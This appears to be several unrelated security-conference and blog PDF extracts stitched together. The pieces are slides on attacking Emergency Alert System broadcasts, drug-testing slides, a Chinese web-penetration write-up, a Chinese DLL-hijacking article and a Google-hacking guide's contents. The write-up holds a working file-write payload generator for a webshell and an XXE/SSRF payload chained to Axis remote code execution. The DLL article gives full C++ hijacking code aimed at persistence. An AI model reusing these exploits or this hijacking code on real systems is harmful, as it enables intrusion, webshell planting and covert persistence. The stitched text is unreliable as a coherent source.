42 dB
36 dB
AM
92 dB
80 dB
76 dB
1 Mile
106 dB
100 dB
94 dB
88 dB
82 dB
FM
116 dB
104 dB
16 Miles
110 dB
98 dB
8 Miles
122 dB
110 dB
32 Miles
104 dB
92 dB
4 Miles
98 dB
86 dB
2 Miles
TV
VHF
Subcarrier Power Output
N/A
N/A
-20 dB ????
N/A
RDS
N/A
N/A
-6 dB
N/A
SC1, SC2
N/A
N/A
0 dB
-12 dB
0 dB
AM
-10 dB
0 dB
0 dB
Main Audio
N/A
N/A
-3 dB
-20 dB
FM
-20 dB
N/A
PRO
-13 dB
N/A
SAP
-10 dB
N/A
Stereo
N/A
N/A
IBOC
TV
VHF
Average Receiver Sensitivity
-70 dB
AM
-70 dB
-117 dB
-70 dB
Main Audio
FM
TV
VHF
VHF Attack Math
• VHF Class A Station (+50 dBm)
• 16 Miles (-104 dB)
• 3 Element Yagi (+6 dB)
• No Subcarrier
50 - 104 + 6 + 0 = -48 dB
-48 dB + 20 dB = -28 dB
VHF Attack Math
• 100W VHF Mobile Radio (+50 dBm)
• 1 Mile (-80 dB)
• 3 Element Yagi (+6 dB)
• Magnet Mount (+2 dB)
• No Subcarrier
50 - 80 + 6 + 2 + 0 = -22 dB
Taking Over
Message
Transmission
Profit!
Header and
Alert Tones
Audio Message
Less Than 120 Sec.
Message
Termination
Location
High ERP
Transmitter
????
Message
Repeats
Message
Logged
Vanned *
* FCC Rules, Part 73.1217, Parts 1.80 - 1.95
• 2007 - ????
• Introduction of “CAP”
– Common Alerting Protocol
– Provision for audio, video and text
– Geographic targeting
– Digital encryption and signature
• 180 Days to implement
• Delayed by Homeland Security
– Don’t expect it for 3 years
4. EAS: The Next Generation
* Executive Order 13407, 06/28/2006
• Pilot Programs
– DEAS (Digital EAS)
– GTAS (Geographical Targeted Alerting
System)
– WARN (Web Alert & Relay Network)
4. EAS: The Next Generation
FluX on: E.A.S.
(Emergency Alert System)
Questions?
[email protected] | pdf |
The Anatomy of Drug Testing
Legal Stuffs
● Scheduling
The purpose
● Schedule I
No medical use/Highly addictive
● Schedule II
Some medical application/Highly addictive
● Schedules III / IV
Legal Stuffs (cont.)
● The DOT
● COC
● Securing the location
● BAT
● COC
● Police vs. Hospitals/Collection sites
Methodologies
● EIA and ELISA
● Spectrophotometry
● Chemiluminescence
● GC/MS (Gas Chromatography/
Mass Spectrophotometry)
● Breathalyzer
Sample types
● Hair
● Urine
● Blood
● Stool
Meconium
● Breath
● Body tissues/fluids
Commonly Tested Drugs
(legal)
● Amphetamines
● TCAs (anti-depressants)
● Oxycodone
● Barbituates
● Benzodiazapines
● Salicilate
● Acetametaphine
Commonly Tested Drugs
(illicit)
● Cocaine
● Methamphetamines
● MDMA (ecstasy)
● Opiates
● PCP
● THC
Uncommonly Tested Drugs
● LSD
● Psyllicibin (Mushrooms)
● DMT
● Mescaline
● Peyote
● Nitrous Oxide
Putting it all together! | pdf |
Author: 远海@websecuritys.cn
0x01:前言 最近忙着复习,所以很少关注安全这块了。本次是针对自己学校某系统的渗透记录,已获得相应授
权。通用漏洞涉及影响单位早前已提交至SRC平台,厂商以发布对应补丁。
0x02:信息收集 目标系统主要是一个支付平台,是近期刚上线的系统,向学校老师取得相应授权后开始测试。
软件开发商:`xx软件开发有限公司/xxsoft/xxxx.com.cn`
开发语言: `Java`
框架: `St2`
因为是近期刚上线的系统,单点认证还没有接入。无法通过单点认证登录此系统,在尝试爆破 admin 密码后无果.
开始转向源码的收集。毕竟白盒才是最直接的手段。源码的收集大致有以下几个思路:
1.百度云盘
2.闲鱼 (部分商家已搭建第三方系统为主可能有存货需要主动询问)
3.同系统站点下存在备份
百度云盘和闲鱼比较费时间,这两个主要看自身对关键词的理解。因为这两个思路基本被人玩的差不多了,也就
不在浪费时间了(后面找了下也确实没有)。先确定了该系统的指纹,使用 fofa 收集相同系统站点。
然后丢进御剑里走一遍。字典如下:
/ROOT.7z
/ROOT.rar
/ROOT.tar
/ROOT.tar.gz
/ROOT.war
/ROOT.zip
/web.tar
/web.tar.gz
/web.rar
这里其实需要注意.很多情况是 tomcat 下部署了多个应用。在不同目录中,而 ROOT 目录中只是几个简单的重定
向 文件。所以在扫描多应用站点时,应该把 ROOT 改成应用所处目录名. 如:
/pay/index.jsp-- > /pay/ --> pay.war
上面这套思路纯粹看运气.结果也是没有扫到.
0x03:某组件存在安全问题
备份走不通只能走一些历史漏洞了。把url列表丢进自己写的轮子里扫一遍: (先是扫了一次目录,后根据目录再次
验证)
发现 ticket 模块下存在 officeserver.jsp ,访问后出现提示
DBSTEP V3.0 0 14 0 请使用Post方法
典型的某格组件,该组件默认存在 SAVEASHTML 方法,攻击者构造特殊的数据包可以造成任意文件的写入: 并且默
认使用 Base64 加密,主要问题在于数据包的构造: 一张图简单了解下具体格式. (别喷,我自己也看不懂)
**解释: **
具体参考 DbStep.jar 中的 StreamToMsg 方法。这里只做简单的解释 数据包的前64字节为配置信息,告诉后端该
如何读取,也就是0-63位。 其中 0:15 赋值给变量 FVersion , 16:31 赋值给变量 BodySize , 32:47 赋值给
ErrorSize . 48:63 赋值给 FFileSize .除了 FVersion ,其余中间内容只能填写数字,代表着各个变量的内容要
读取多少位. 以 BodySize 为例子,这里的内容为 114 ,也就是说去除数据前64字节,在往后读114字节.这114字
节内容赋值给 FMsgText .之后取参数也是从 FMsgText 中取,每个参数以 \n\t 进行分割。
以此类推. 了解如何构造对应数据包后开始编写脚本: 该组件默认会有一个 SAVEASHTML 方法。可以将
FFileSize 截取的内容存储到文件中。导致任意文件的写入。
else if (mOption.equalsIgnoreCase("SAVEASHTML")) { //
ĴΪOFFICEΪHTMLҳ
mHtmlName = MsgObj.GetMsgByName("HTMLNAME"); //
ȡļ
mDirectory = MsgObj.GetMsgByName("DIRECTORY"); //ȡĿ¼
MsgObj.MsgTextClear();
if (mDirectory.trim().equalsIgnoreCase("")) {
mFilePath = mFilePath + "\\HTML";
}
else {
mFilePath = mFilePath + "\\HTML\\" + mDirectory;
}
MsgObj.MakeDirectory(mFilePath); //·
if (MsgObj.MsgFileSave(mFilePath + "\\" + mHtmlName)) { //
HTMLļ
MsgObj.MsgError(""); //
Ϣ
MsgObj.SetMsgByName("STATUS", "HTMLɹ!"); //
Ϣ̬״
}
else {
MsgObj.MsgError("HTMLʧ!"); //
ôϢ
}
MsgObj.MsgFileClear();
}
当文件夹不存在时会自动创建对应的文件夹。 MsgFileSave 方法后面拼接的 mHtmlName 内容可控,写入文件可
以 尝试跨目录。编写生成脚本:
body = f"""DBSTEP=REJTVEVQ OPTION=U0FWRUFTSFRNTA== HTMLNAME=Ly4uLy4uLzEuanNw DIRECTORY=Lw==
LOCALFILE=MQ==""".replace(
' ', '\n').strip()
coente="""hello1"""
fileContent=f'''
{coente}
'''.replace("\n","").strip()
payload="DBSTEP V3.0 "
bodysieze=str(len(body))
filesize=str(len(fileContent))
payload+=str(int(bodysieze)+3)+' '*(16-len(bodysieze))+'0'+' '*15+filesize+' '*(16-
len(filesize))+body+fileContent
FVersion=payload[0:15]
print("version:",FVersion)
Body=payload[16:31]
print("BodySize:",Body)
Error=payload[32:47]
print("ErrorSize:",Error)
File=payload[48:63]
print("FileSize:",File)
print(payload)
使用 postman 发送 payload 到指定文件。
可能是觉得我操作的过于顺利,返回保存文件失败的内容,于是陷入了沉思。经过一系列的探索。我发现,当
FileName 中的内容不存在 /../ 跨目录符号时就能保存成功。
因为 mFilePath 取值就是当前应用的根目录
所以文件应该在 HTML 目录下。尝试访问.
返回404错误,证明文件并没有写入到指定位置中。 0x04:Linux和Windows 写入文件的差异性
最后在请教忍酱后得知,由于目标是 Linux 系统,在 linux 系统中, \\ 被当做成一个文件夹。而
FileOutputStream 在写入文件时如果文件夹不存在会直接抛出错误。
Demo:
当写入文件时。由于文件夹不存在会创建一个 \HTML\test 的文件夹。而最终写入路径中的文件夹名为
\HTML\test\\ , HTML\test\\ 名字的文件夹是不存在的,导致文件无法写入成功 .
在不使用 /../ 跨目录符号时,文件最终会以 \\HTML\\test\\1.txt 的文件名进行存储,这与预期也是不符合
的。
解决方案:
在了解无法写入的原因后,开始寻找解决方法。既然该方法可以创建文件夹,那么如果我预先创建一个
\HTML\test\\ 命名的文件夹,后续不就可以写入了?\ 在创建文件夹时,如果 mDirectory 的内容不为空,那么
最终存储的目录地址会进行一个拼接,然后创建。我们可 以在 mDirectory 上做一些尝试。在创建的文件夹名
后面添加 \\\ 符号,来确保能创建我们预期的文件夹名
实践: 这里写了一个Demo,模拟最终写入文件的流程。在 path2 上添加多个 \\ .最终成功创建出了预期的
\HTML\test\\ 文件夹。(实际环境中其实需要3个)
有了对应的文件夹,再次尝试写入,由于拼接的原因,需要在原来的目录后去掉一个 \ 写入成功: 完成跨目录
根据目标系统生成对应的POC: 总共分两个步骤: 1.创建文件夹 2.写入文件
再次尝试写入文件:
成功写入!
0x05:终点也是起点 成功拿到Webshell后,根据现有POC.尝试在目标系统上复现,发现不存在 ticket 模
块???,白干了?
好在先前拿的系统中存在 PAY 模块,可以直接下载下来进行代码审计。一顿审计过后发现并没有什么利用
点???,该系统不存在文件上传点,并且SQL注入都会对传入的字符做处理
统一使用 org.apache.commons.lang.StringEscapeUtils.escapeSql 方法进行过滤。
这导致后续利用难。但是根据 web.xml ,发现该应用使用了 AXIS 且版本为1.4也开启了远程访问
Axis1.4 是存在一个远程命令执行的,可以向 web service 中添加恶意方法。导致命令执行。
具体可以参考文章:https://paper.seebug.org/1489/#13-axis
该漏洞利用需要一个SSRF漏洞,来组合利用。 根据现有代码开始查找,是否有可控点。一顿操作下来发现并没有
可以利用的SSRF点。基本都是固定的URL。
回想起最近才复现的 MySQL JDBC XXE漏洞(CVE-2021-2471) .xxe也是可以发送http请求的。(主要是平时不太关
注这类漏洞)
在JAVA中,可能造成XXE漏洞的主要有以下:
SAXBuilder
SAXParserFactory
SAXReader
SAXTransformerFactory
TransformerFactory
ValidatorSample
XMLReader
Unmarshaller
SchemaFactory
.....
最终审计发现了一处 SAXBuilder 所造成的XXE漏洞。
构造Payload,测试一下dnslog。 Payload:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE b [<!ENTITY xxe SYSTEM "http://127.0.0.1:8041/?hello">]><name>&xxe;</name>
得到响应。 有了SSRF,后续利用起来也比较方便了。因为此系统安装路径都是统一的,公开的几个利用链都是第
三方jar 包, LogHandler 比较麻烦。所以这里在内置方法类中找了一个文件写入的方法。 FileUtil 下有一个
writeFileContent 方法,可以直接写入文件。
使用SSRF GET请求添加到 Web services ,"会有端口不一样的情况!" ( POST转换一下格式就可以 )
方法被成功添加到 Web Services 中
调用方法,写入文件。成功拿到Webshell! | pdf |
⾃动化通⽤DLL劫持 - 1
⾃动化通⽤DLL劫持
之前写过⼀篇
使⽤⽩加⿊的⽅式⽣成"冲锋⻢",使⽤到部分 dll 劫持的技术。但是它的场景是劫持后阻断正常⽩⽂件的运⾏,程序的控制权交到“⿊⽂
件”中。
这篇⽂章是对通⽤ DLL 劫持的研究,期望能制作⼀个通⽤的 DLL,劫持程序原有的 dll 但保留原 dll 的功能,同时执⾏⾃⼰的代码,这个 dll
最好能⾃动⽣成(不要⼿动编译),主要⽤于维权场景。
已有研究
Aheadlib
著名的⼯具 Aheadlib 能直接⽣成转发形式的 dll 劫持源码,通过 #pragma comment(linker,"/EXPORT:") 来指定导出表的转发。
转发模式⽣成的源码:
红队开发 - ⽩加⿊⾃动化⽣成器.md - ⼩草窝博客
参考⼀些APT组织的攻击⼿法,它们在投递⽊⻢阶段有时候会使⽤“⽩加⿊”的⽅式,通常它们会使⽤⼀个带有签名的⽩⽂件+⼀个⾃定义dll⽂件,所以
研究了⼀下这种⽩加⿊的实现⽅式以及如何将...
x.hacking8.com
⾃动化通⽤DLL劫持 - 2
C++
及时调⽤模式⽣成的源码:
每个导出函数会跳转到⼀个全局保存的地址中,在 dll 初始化的时候会通过解析原 dll 对这些地址依次赋值。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
// 头文件
#include <Windows.h>
//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
// 导出函数
#pragma comment(linker, "/EXPORT:Box=testOrg.Box,@1")
//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
// 入口函数
BOOL WINAPI DllMain(HMODULE hModule, DWORD dwReason, PVOID pvReserved)
{
if (dwReason == DLL_PROCESS_ATTACH)
{
DisableThreadLibraryCalls(hModule);
}
else if (dwReason == DLL_PROCESS_DETACH)
{
}
return TRUE;
}
//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
⾃动化通⽤DLL劫持 - 3
C++
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
// 头文件
#include <Windows.h>
/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
// 导出函数
#pragma comment(linker, "/EXPORT:Box=_AheadLib_Box,@1")
/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
// 原函数地址指针
PVOID pfnBox;
/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
// 宏定义
#define EXTERNC extern "C"
#define NAKED __declspec(naked)
#define EXPORT __declspec(dllexport)
#define ALCPP EXPORT NAKED
#define ALSTD EXTERNC EXPORT NAKED void __stdcall
#define ALCFAST EXTERNC EXPORT NAKED void __fastcall
#define ALCDECL EXTERNC NAKED void __cdecl
/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
// AheadLib 命名空间
namespace AheadLib
{
HMODULE m_hModule = NULL; // 原始模块句柄
DWORD m_dwReturn[1] = {0}; // 原始函数返回地址
// 获取原始函数地址
FARPROC WINAPI GetAddress(PCSTR pszProcName)
{
FARPROC fpAddress;
CHAR szProcName[16];
TCHAR tzTemp[MAX_PATH];
fpAddress = GetProcAddress(m_hModule, pszProcName);
if (fpAddress == NULL)
{
if (HIWORD(pszProcName) == 0)
{
wsprintfA(szProcName, "%d", pszProcName);
pszProcName = szProcName;
⾃动化通⽤DLL劫持 - 4
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
}
wsprintf(tzTemp, TEXT("无法找到函数 %hs,程序无法正常运行。"), pszProcName);
MessageBox(NULL, tzTemp, TEXT("AheadLib"), MB_ICONSTOP);
ExitProcess(-2);
}
return fpAddress;
}
// 初始化原始函数地址指针
inline VOID WINAPI InitializeAddresses()
{
pfnBox = GetAddress("Box");
}
// 加载原始模块
inline BOOL WINAPI Load()
{
TCHAR tzPath[MAX_PATH];
TCHAR tzTemp[MAX_PATH * 2];
lstrcpy(tzPath, TEXT("testOrg.dll"));
m_hModule = LoadLibrary(tzPath);
if (m_hModule == NULL)
{
wsprintf(tzTemp, TEXT("无法加载 %s,程序无法正常运行。"), tzPath);
MessageBox(NULL, tzTemp, TEXT("AheadLib"), MB_ICONSTOP);
}
else
{
InitializeAddresses();
}
return (m_hModule != NULL);
}
// 释放原始模块
inline VOID WINAPI Free()
{
if (m_hModule)
{
FreeLibrary(m_hModule);
}
}
}
using namespace AheadLib;
/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
// 入口函数
BOOL WINAPI DllMain(HMODULE hModule, DWORD dwReason, PVOID pvReserved)
{
if (dwReason == DLL_PROCESS_ATTACH)
{
DisableThreadLibraryCalls(hModule);
return Load();
}
else if (dwReason == DLL_PROCESS_DETACH)
{
Free();
}
⾃动化通⽤DLL劫持 - 5
缺点也有,它在导出函数中使⽤汇编语法直接 jump 到⼀个地址,但在 x64 模式下⽆法使⽤,这种写法感觉也不太优雅。
不过 Aheadlib ⽣成的源码,编译出来⽐较通⽤,适合 输入表dll加载 以及 Loadlibrary 加载劫持的形式。
易语⾔ DLL 劫持⽣成
这个⼯具⽣成的源码看起来⽐ Aheadlib 简洁⼀点,它会 LoadLibrary 原始 dll,通过 GetProcAddress 获取原始 dll 的函数地址和本身
dll 的函数地址,直接在函数内存地址写⼊ jmp 到原始 dll 函数的机器码。
这种⽅式⽐上⾯的代码简洁,⽤ C 改写下,⽀持 x64 的话计算⼀下相对偏移应该也 ok。但还是⽐较依赖于⾃动⽣成源码,再进⾏编译。
⼀种通⽤ DLL 劫持技术研究
来⾃:
作者通过分析 LoadLibraryW 的调⽤堆栈以及相关源码得出结论
测试代码也很简单
136
137
return TRUE;
}
/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
// 导出函数
ALCDECL AheadLib_Box(void)
{
__asm JMP pfnBox;
}
/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
https://www.52pojie.cn/forum.php?mod=viewthread&tid=830796
直接获取 peb->ldr 遍历链表找到⽬标 dll 堆栈的 LdrEntry 就是需要修改的 LdrEntry,然后修改即可作为通⽤ DLL 劫持。
⾃动化通⽤DLL劫持 - 6
C++
Github 地址:
我将这个代码精简优化了下,也⽀持了 x64
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
void* NtCurrentPeb()
{
__asm {
mov eax, fs:[0x30];
}
}
PEB_LDR_DATA* NtGetPebLdr(void* peb)
{
__asm {
mov eax, peb;
mov eax, [eax + 0xc];
}
}
VOID SuperDllHijack(LPCWSTR dllname, HMODULE hMod)
{
WCHAR wszDllName[100] = { 0 };
void* peb = NtCurrentPeb();
PEB_LDR_DATA* ldr = NtGetPebLdr(peb);
for (LIST_ENTRY* entry = ldr->InLoadOrderModuleList.Blink;
entry != (LIST_ENTRY*)(&ldr->InLoadOrderModuleList);
entry = entry->Blink) {
PLDR_DATA_TABLE_ENTRY data = (PLDR_DATA_TABLE_ENTRY)entry;
memset(wszDllName, 0, 100 * 2);
memcpy(wszDllName, data->BaseDllName.Buffer, data->BaseDllName.Length);
if (!_wcsicmp(wszDllName, dllname)) {
data->DllBase = hMod;
break;
}
}
}
VOID DllHijack(HMODULE hMod)
{
TCHAR tszDllPath[MAX_PATH] = { 0 };
GetModuleFileName(hMod, tszDllPath, MAX_PATH);
PathRemoveFileSpec(tszDllPath);
PathAppend(tszDllPath, TEXT("mydll.dll.1"));
HMODULE hMod1 = LoadLibrary(tszDllPath);
SuperDllHijack(L"mydll.dll", hMod1);
}
BOOL APIENTRY DllMain( HMODULE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved
)
{
switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
DllHijack(hModule);
break;
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}
https://github.com/anhkgg/SuperDllHijack
⾃动化通⽤DLL劫持 - 7
C++
缺点是这种⽅式只适⽤于 LoadLibrary 动态加载的⽅式。
在 issue 中有⼈对隐藏性作了讨论
思路不错,也放上来展示⼀下。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
#include "pch.h"
#include <stdio.h>
#include <iostream>
#include <winternl.h>
void SuperDllHijack(LPCWSTR dllname)
{
#if defined(_WIN64)
auto peb = PPEB(__readgsqword(0x60));
#else
auto peb = PPEB(__readfsdword(0x30));
#endif
auto ldr = peb->Ldr;
auto lpHead = &ldr->InMemoryOrderModuleList;
auto lpCurrent = lpHead;
while ((lpCurrent = lpCurrent->Blink) != lpHead)
{
PLDR_DATA_TABLE_ENTRY dataTable = CONTAINING_RECORD(lpCurrent, LDR_DATA_TABLE_ENTRY, InMemoryOrderLinks);
WCHAR wszDllName[100] = { 0 };
memset(wszDllName, 0, 100 * 2);
memcpy(wszDllName, dataTable->FullDllName.Buffer, dataTable->FullDllName.Length);
if (_wcsicmp(wszDllName, dllname) == 0) {
HMODULE hMod1 = LoadLibrary(TEXT("test.dll.1"));
dataTable->DllBase = hMod1;
break;
}
}
}
BOOL APIENTRY DllMain(HMODULE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved
)
{
if (ul_reason_for_call == DLL_PROCESS_ATTACH) {
WCHAR ourPath[MAX_PATH];
GetModuleFileNameW(hModule, ourPath, MAX_PATH);
SuperDllHijack(ourPath);
MessageBox(NULL, TEXT("劫持成功"), TEXT("1"), MB_OK);
}
return TRUE;
}
https://github.com/anhkgg/SuperDllHijack/issues/5
⾃动化通⽤DLL劫持 - 8
⾃适应 DLL 劫持
⽼外的⽂章,原⽂:
研究了⼀种万能 dll,来适
应各种劫持情况。
也提供了⼯具地址,Github:
⽂章对原理研究的也⽐较深⼊。
对于静态加载(在输⼊表中)的 dll,它的调⽤堆栈如下
C++
在进程启动时,会进⾏依赖分析,来检查每个导⼊表中的函数,所以对于静态加载的 dll 劫持,必须要有导出表。
对于导出表的函数地址,是在修补时完成并写⼊ peb→ldr 中的,这部分可以动态修改。
那么如何⾃动化实现对于静态加载 dll 的通⽤劫持呢,
做了⼀个导出表克隆⼯具,在编译好了
的⾃适应 dll 后,可以⽤
这个导出表克隆⼯具把要劫持的 dll 的导出表复制到这个 dll 上,在 dllmain 初始化时修补 IAT 从⽽实现正常加载。
对于动态加载(使⽤ LoadLibrary)的 dll,它的调⽤堆栈如下
https://www.netspi.com/blog/technical/adversary-simulation/adaptive-dll-hijacking/
https://github.com/monoxgas/Koppeling
1
2
3
4
5
6
7
8
ntdll!LdrInitializeThunk <- 新进程启动
ntdll!LdrpInitialize
ntdll!_LdrpInitialize
ntdll!LdrpInitializeProcess
ntdll!LdrpInitializeGraphRecurse <- 依赖分析
ntdll!LdrpInitializeNode
ntdll!LdrpCallInitRoutine
evil!DllMain <- 执行的函数
Koppeling
Koppeling
⾃动化通⽤DLL劫持 - 9
C++
使⽤ LoadLibrary 加载的 dll,系统是没有检查它的导出表的,但是使⽤ GetProcAddress 后,会从导出表中获取函数。
的做法是在初始化后,将被劫持 dll 的导出表克隆⼀份,将⾃身导出表地址修改为克隆的地址。
相关代码如下,
1
2
3
4
5
6
7
8
9
KernelBase!LoadLibraryExW <- 调用loadlibrary
ntdll!LdrLoadDll
ntdll!LdrpLoadDll
ntdll!LdrpLoadDllInternal
ntdll!LdrpPrepareModuleForExecution
ntdll!LdrpInitializeGraphRecurse <- 依赖图构建
ntdll!LdrpInitializeNode
ntdll!LdrpCallInitRoutine
evil!DllMain <- 执行初始化函数
Koppeling
⾃动化通⽤DLL劫持 - 10
C++
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
///
// 4 - Clone our export table to match the target DLL (for GetProcAddress)
///
auto ourHeaders = (PIMAGE_NT_HEADERS)(ourBase + PIMAGE_DOS_HEADER(ourBase)->e_lfanew);
auto ourExportDataDir = &ourHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT];
if (ourExportDataDir->Size == 0)
return FALSE; // Our DLLs doesn't have any exports
auto ourExportDirectory = PIMAGE_EXPORT_DIRECTORY(ourBase + ourExportDataDir->VirtualAddress);
// Make current header data RW for redirections
DWORD oldProtect = 0;
if (!VirtualProtect(
ourExportDirectory,
sizeof(PIMAGE_EXPORT_DIRECTORY), PAGE_READWRITE,
&oldProtect)) {
return FALSE;
}
DWORD totalAllocationSize = 0;
// Add the size of jumps
totalAllocationSize += targetExportDirectory->NumberOfFunctions * (sizeof(jmpPrefix) + sizeof(jmpRax) + sizeof(LP
VOID));
// Add the size of function table
totalAllocationSize += targetExportDirectory->NumberOfFunctions * sizeof(INT);
// Add total size of names
PINT targetAddressOfNames = (PINT)((PBYTE)targetBase + targetExportDirectory->AddressOfNames);
for (DWORD i = 0; i < targetExportDirectory->NumberOfNames; i++)
totalAllocationSize += (DWORD)strlen(((LPCSTR)((PBYTE)targetBase + targetAddressOfNames[i]))) + 1;
// Add size of name table
totalAllocationSize += targetExportDirectory->NumberOfNames * sizeof(INT);
// Add the size of ordinals:
totalAllocationSize += targetExportDirectory->NumberOfFunctions * sizeof(USHORT);
// Allocate usuable memory for rebuilt export data
PBYTE exportData = AllocateUsableMemory((PBYTE)ourBase, totalAllocationSize, PAGE_READWRITE);
if (!exportData)
return FALSE;
PBYTE sideAllocation = exportData; // Used for VirtualProtect later
// Copy Function Table
PINT newFunctionTable = (PINT)exportData;
CopyMemory(newFunctionTable, (PBYTE)targetBase + targetExportDirectory->AddressOfNames, targetExportDirectory->Nu
mberOfFunctions * sizeof(INT));
exportData += targetExportDirectory->NumberOfFunctions * sizeof(INT);
ourExportDirectory->AddressOfFunctions = DWORD((PBYTE)newFunctionTable - (PBYTE)ourBase);
// Write JMPs and update RVAs in the new function table
PINT targetAddressOfFunctions = (PINT)((PBYTE)targetBase + targetExportDirectory->AddressOfFunctions);
for (DWORD i = 0; i < targetExportDirectory->NumberOfFunctions; i++) {
newFunctionTable[i] = DWORD((exportData - (PBYTE)ourBase));
CopyMemory(exportData, jmpPrefix, sizeof(jmpPrefix));
exportData += sizeof(jmpPrefix);
PBYTE realAddress = (PBYTE)((PBYTE)targetBase + targetAddressOfFunctions[i]);
CopyMemory(exportData, &realAddress, sizeof(LPVOID));
exportData += sizeof(LPVOID);
CopyMemory(exportData, jmpRax, sizeof(jmpRax));
⾃动化通⽤DLL劫持 - 11
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
exportData += sizeof(jmpRax);
}
// Copy Name RVA Table
PINT newNameTable = (PINT)exportData;
CopyMemory(newNameTable, (PBYTE)targetBase + targetExportDirectory->AddressOfNames, targetExportDirectory->Number
OfNames * sizeof(DWORD));
exportData += targetExportDirectory->NumberOfNames * sizeof(DWORD);
ourExportDirectory->AddressOfNames = DWORD(((PBYTE)newNameTable - (PBYTE)ourBase));
// Copy names and apply delta to all the RVAs in the new name table
for (DWORD i = 0; i < targetExportDirectory->NumberOfNames; i++) {
PBYTE realAddress = (PBYTE)((PBYTE)targetBase + targetAddressOfNames[i]);
DWORD length = (DWORD)strlen((LPCSTR)realAddress);
CopyMemory(exportData, realAddress, length);
newNameTable[i] = DWORD((PBYTE)exportData - (PBYTE)ourBase);
exportData += (ULONG_PTR)length + 1;
}
// Copy Ordinal Table
PINT newOrdinalTable = (PINT)exportData;
CopyMemory(newOrdinalTable, (PBYTE)targetBase + targetExportDirectory->AddressOfNameOrdinals, targetExportDirecto
ry->NumberOfFunctions * sizeof(USHORT));
exportData += targetExportDirectory->NumberOfFunctions * sizeof(USHORT);
ourExportDirectory->AddressOfNameOrdinals = DWORD((PBYTE)newOrdinalTable - (PBYTE)ourBase);
if (!VirtualProtect(
ourExportDirectory,
sizeof(PIMAGE_EXPORT_DIRECTORY), oldProtect,
&oldProtect)) {
return FALSE;
}
if (!VirtualProtect(
sideAllocation,
totalAllocationSize,
PAGE_EXECUTE_READ,
&oldProtect)) {
return FALSE;
} | pdf |
The Google Hacker’s Guide
[email protected]
http://johnny.ihackstuff.com
- Page 1 -
The Google Hacker’s Guide
Understanding and Defending Against
the Google Hacker
by Johnny Long
[email protected]
http://johnny.ihackstuff.com
The Google Hacker’s Guide
[email protected]
http://johnny.ihackstuff.com
- Page 2 -
GOOGLE SEARCH TECHNIQUES................................................................................................................ 3
GOOGLE WEB INTERFACE................................................................................................................................... 3
BASIC SEARCH TECHNIQUES .............................................................................................................................. 7
GOOGLE ADVANCED OPERATORS ........................................................................................................... 9
ABOUT GOOGLE’S URL SYNTAX .................................................................................................................... 12
GOOGLE HACKING TECHNIQUES........................................................................................................... 13
DOMAIN SEARCHES USING THE ‘SITE’ OPERATOR........................................................................................... 13
FINDING ‘GOOGLETURDS’ USING THE ‘SITE’ OPERATOR................................................................................. 14
SITE MAPPING: MORE ABOUT THE ‘SITE’ OPERATOR...................................................................................... 15
FINDING DIRECTORY LISTINGS........................................................................................................................ 16
VERSIONING: OBTAINING THE WEB SERVER SOFTWARE / VERSION............................................................. 17
via directory listings ................................................................................................................................... 17
via default pages ......................................................................................................................................... 19
via manuals, help pages and sample programs......................................................................................... 21
USING GOOGLE TO FIND INTERESTING FILES AND DIRECTORIES .................................................................... 23
inurl: searches............................................................................................................................................. 23
filetype:........................................................................................................................................................ 24
combination searches ................................................................................................................................. 24
ws_ftp.log file searches............................................................................................................................... 24
USING SOURCE CODE TO FIND VULNERABLE TARGETS .................................................................................. 25
USING GOOGLE AS A CGI SCANNER................................................................................................................ 28
ABOUT GOOGLE AUTOMATED SCANNING.......................................................................................... 30
OTHER GOOGLE STUFF .............................................................................................................................. 31
